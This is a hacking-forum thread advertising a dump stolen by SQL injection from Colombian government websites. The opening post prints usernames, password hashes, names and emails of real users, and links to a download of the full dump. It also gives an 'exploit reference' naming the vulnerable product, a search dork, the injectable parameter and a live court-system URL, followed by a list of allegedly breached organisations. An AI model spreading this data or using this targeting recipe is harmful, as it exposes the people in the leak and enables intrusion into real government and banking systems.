TXT .gov.co (Dump) - Explotation SQLi (Exploit)
by teamkelvinsecteam - May 04, 2021 at 01:57 AM
#1
Star 
[align=center][Image: 9bXx.gif]

Table users:

login pass nombre apellido email telefono

pwd:


adavid.isaza d6c62d2a9f585388a75cbf5f612d8a82 ANDRES ISAZA [/align]
adiela.orozco b13c9be5964ad5ce096a69deeb805b6e LUZ OROZCO [email protected]
admin 6c44e5cd17f0019c64b042e4a745412a Administrador Del Sistema [email protected]
adriana.cardona 8a4ad91754c5ac81aee2ab3045fb49a0 LUZ CARDONA
adriana.cuaical 504a0ef3b4153de222e7b24cacc30f3f ADRIANA CUAICAL [email protected]
adriana.jojoa b475d2039f03f77e3c95eb475e53e145 ADRIANA JOJOA [email protected]
adriana.martinez 3e33356f641deb88b029fd32cf76ee08 ADRIANA MARTINEZ [email protected]
aeduardo.molina 7dded6c1e4730e50a5373935f7fe0114 ANDRES MOLINA [email protected]

Dowload Dumps:


https://anonfiles.com/Xfrey2u4ua/Colombi...tation_zip

Reference Exploit:

Title: Priv8 Colombia Goverment WebSites .gov.co (SQLi)
Server: Apache
author research: KelvinSecurity
Produt: ITS Gestion
Dork: ext:php Powered by: ITS Soluciones Estrat√©gicas [email protected]

Links & Parameters:

Link: ModeloCSJ / listado_maestro_documentos_externos.php? id_proceso =

parametro_SQL_Inyeccion: id_proceso =

example:

http: //sistemagestioncalidad.ramajudicial.gov.co/ModeloCSJ/listado_maestro_documentos_externos.php? id_proceso = ``

Fault description: An SQL injection attack consists of the insertion or "injection" of an SQL query through the input data from the client to the application. A successful SQL injection exploit can read confidential data from the database, modify the data of the database (Insert / Update / Delete).

List Of Customers

TELEANTIOQUIA - informative page
Superior council of the judiciary - government page
FONADE - Government page
MEN - Government page
INternational Finance Corporation - Banking Corporation
DNP - Government Page
Confecamaras - Network of commerce
COLCIENCIAS - Government Page
SNR - Superintendence of notarial and registration
General Prosecutor Of the Nation
Chamber of Commerce Bogota
Credit Bank
Reply
#2
SQL injections.. in 2021.. EEHHH? I feel kinda dumb not knowing how it works exactly unless it's that GOOD OLD simple SQL injection
Reply
#3
(May 04, 2021 at 02:00 AM)Jimbzo Wrote: SQL injections.. in 2021.. EEHHH? I feel kinda dumb not knowing how it works exactly unless it's that GOOD OLD simple SQL injection

Wym in "2021"..... everyone makes mistakes.
Reply
#4
(May 04, 2021 at 02:00 AM)Jimbzo Wrote: SQL injections.. in 2021.. EEHHH? I feel kinda dumb not knowing how it works exactly unless it's that GOOD OLD simple SQL injection

lol you can still bypass some logins with magic quotes. no matter 2021 or 1990 Smile
Reply
#5
omg pls https://twitter.com/1ZRR4H/status/138939...24/photo/1
Reply

Possibly Related Threads…
Thread Author Replies Views Last Post
#OpColombia - Gov Doc Leaks by http_v0g3l [Vol.2] (1.24GB) http_v0g3l 0 140 36 minutes ago
Last Post: http_v0g3l
CSV [#OpColombia] hmgy.gov.co - DB leaked by http_v0g3l http_v0g3l 4 1,301 May 07, 2021 at 09:47 AM
Last Post: http_v0g3l
SQL funcionpublica.gov.co Leak Users teamkelvinsecteam 4 866 May 07, 2021 at 01:56 AM
Last Post: Maxim Gorky

 Users browsing this thread: 2 Guest(s)